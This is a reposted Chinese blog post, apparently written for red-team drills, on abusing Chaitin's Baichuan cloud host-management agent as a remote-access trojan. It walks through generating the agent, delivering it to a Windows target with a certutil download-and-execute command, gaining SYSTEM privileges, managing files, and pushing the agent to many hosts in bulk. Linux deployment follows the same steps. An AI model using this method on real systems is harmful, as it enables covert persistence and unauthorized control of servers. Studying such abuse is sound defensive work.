实战攻防演练-利用长亭百川云平台上线远控提权

这篇具有很好参考价值的文章主要介绍了实战攻防演练-利用长亭百川云平台上线远控提权。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

前言

长亭百川云平台是北京长亭未来科技有限公司旗下的 SaaS 产品服务平台,专注于云安全解决方案。其提供牧云·主机管理助手、网站监测、牧云·云原生安全平台、雷池 Web 应用防火墙等一系列在线安全产品,帮助企业用户更轻松地治理云安全问题,使云上业务更加安全可靠。在使用中发现该产品可以用于攻防对抗中实战,其生成的客户端可是远程上线,获取到服务器主机任意权限,最后会提升至系统权限,适用于后渗透权限提升维持。

实战演示

网站地址:https://rivers.chaitin.cn
在开始使用长亭百川云服务之前,需要先注册一个百川云账号。有账号后可以在百川云登录
实战攻防演练-利用长亭百川云平台上线远控提权

选择进入工作台,选择牧云主机管理助手
实战攻防演练-利用长亭百川云平台上线远控提权

其中这里区分三个版本,基础版,体验版,付费版,具体如下所示,掏钱的肯定比不掏好用,看个人情况选择。
实战攻防演练-利用长亭百川云平台上线远控提权

Windows上线木马

这里如下所示,windows主机需要浏览器下载后,使用其他命令运行
实战攻防演练-利用长亭百川云平台上线远控提权

这里首先下载木马文件后上传至自己的网站服务器,使用certutil命令下载执行
certutil -urlcache -split -f http://127.0.0.1/installer.exe c:\installer.exe && start installer.exe
或者直接上传目标服务器运行 start installer.exe
实战攻防演练-利用长亭百川云平台上线远控提权

服务端就会上线
实战攻防演练-利用长亭百川云平台上线远控提权

配置信息

这里可以对上线主机进行查看基础配置,和文件管理操作
实战攻防演练-利用长亭百川云平台上线远控提权
实战攻防演练-利用长亭百川云平台上线远控提权

权限提升

如下,我们使用Administrator权限上线执行,牧云管理助手直接获取到系统权限,省去权限提升步骤
实战攻防演练-利用长亭百川云平台上线远控提权

Linux上线木马

配置入上一致,linux直接复制命令后,在目标主机执行,详细操作类似于windows操作
实战攻防演练-利用长亭百川云平台上线远控提权
实战攻防演练-利用长亭百川云平台上线远控提权
实战攻防演练-利用长亭百川云平台上线远控提权

详细配置

实战攻防演练-利用长亭百川云平台上线远控提权

其他功能

可以执行管理查看docker服务
实战攻防演练-利用长亭百川云平台上线远控提权

安全扫描功能可以检测主机漏洞风险,及常见漏洞等
实战攻防演练-利用长亭百川云平台上线远控提权

应用市场可以下载各种软件
实战攻防演练-利用长亭百川云平台上线远控提权

统一配置

推送命令模块可以对多主机群进行批量上线木马
实战攻防演练-利用长亭百川云平台上线远控提权

批量命令执行
实战攻防演练-利用长亭百川云平台上线远控提权文章来源地址https://www.toymoban.com/news/detail-711355.html

到了这里,关于实战攻防演练-利用长亭百川云平台上线远控提权的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 服务攻防-应用协议-远控软件漏洞&向日葵&VNC&TV-平台漏洞&Kibana&Zabbix-附真实案例演示

    目录 一、导图 二、远程控制-向日葵VncTeamviewer 1、向日葵         ▶漏洞利用工具下载地址:         ▶实例展示: 2、Vnc         ▶Vnc简介:         ▶实例展示: 3、Teamviewer         ▶Teamviewer简介:         ▶实例展示: 三、设备平台-Zabbix-CVE-2022-2

    2024年02月10日
    浏览(42)
  • 红蓝攻防演练怎样构建实战化网络安全防御体系

    笔者简介                团队以攻防技术为核心,在云端大数据支撑下聚焦威胁检测和响 应,具备咨询规划、威胁检测、攻防演练、持续响应、预警通告、安 全运营等一系列实战化服务能力,是一支能够为客户提供全周期安全 保障服务的专业网络安保和应急响应团队

    2024年02月01日
    浏览(61)
  • 重磅预告丨Fortinet Demo Day系列实战攻防演练来袭!

    随着网络安全形势的日趋严峻,越来越多的企业遭受了勒索、欺诈等危害。在高昂的赎金、生产损失,以及名誉损害的恐惧中,企业已经谈“黑”色变。黑客是如何悄无声息的“越过”重重高墙、道道壁垒进入到生产环境、办公空间,并在内网疯狂肆虐的,这都让企业管理人

    2024年02月13日
    浏览(35)
  • BadUSB超详细制作, 实现CobaltStrike远控上线

    在2014年美国黑帽大会上,安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”的攻击方法,这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态 现在的USB设备很多,比如语音视频设备、摄像头等,因此要求系

    2024年02月06日
    浏览(45)
  • 网络安全攻防演练项目介绍

    有很多朋友问我写的攻防演练是什么? 本文给予回答 网络安全攻防演练是公安部组织的面向税务、电力、电信、银行、铁路、财政、广电、水利、教育、互联网、检察院、法院、石油、交通等行业的政府单位/公司,开展的实战攻防演练,也简称为护网。 攻防演练主要目标是

    2024年02月09日
    浏览(45)
  • 网络攻防演练.网络安全.学习

    网络安全攻防演练是指通过模拟各种网络攻击手段,来测试自身安全防御能力和应对能力的一种演练活动。本文总结了网络安全攻防演练的重要性、准备工作以及演练过程中需要注意的事项。 一、网络安全攻防演练的重要性 网络安全攻防演练是对自身网络安全现状的一种全面

    2024年02月13日
    浏览(44)
  • 安全攻防实战丨如何预防利用中间人攻击进行小程序刷分

    本文分享自华为云社区《【安全攻防】深入浅出实战系列专题-利用中间人攻击进行小程序刷分》,作者: MDKing 。 中间人攻击(Man-in-the-middle attack,简称MITM)是攻击者在进行网络通信的双方中间,分别与两端建立独立的联系,并进行数据嗅探甚至篡改,而通信的双方却对中

    2024年02月08日
    浏览(36)
  • 攻防演练:渗透测试云上初体验

    免责声明:涉及到的所有技术仅用来学习交流,严禁用于非法用途,未经授权请勿非法渗透。否则产生的一切后果自行承担! 该渗透测试项目为已授权项目,本文已对敏感部分做了相关处理。 渗透测试本质还是在于信息收集,信息收集的越多,攻击面就越广,成功拿下主机

    2024年02月15日
    浏览(55)
  • 攻防演练-组织沙盘推演的4个阶段.

    沙盘推演是在实战攻防演练的基础上,在攻击路线、攻击手段等 的有效性被证实的情况下,评估真实网络攻击可能对政企机构及公共 安全产生的影响,包括经济损失、声誉损失和社会影响等;同时,对 攻防过程中应急响应的有效性进行全过程评估。 传统的实战攻防演练更多

    2024年02月04日
    浏览(44)
  • 『哈士奇赠书31期』- 『网络靶场与攻防演练』

    《网络靶场与攻防演练》全面阐述了网络靶场与攻防演练的基础理论、重要技术与实施要点,梳理了网络靶场的演进脉络与发展趋势,总结了网络靶场的常见类型与应用模式,围绕实现主流网络靶场所需的关键技术地图、系统平台、核心能力、建设路径和运营模式,结合具体

    2024年02月16日
    浏览(40)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包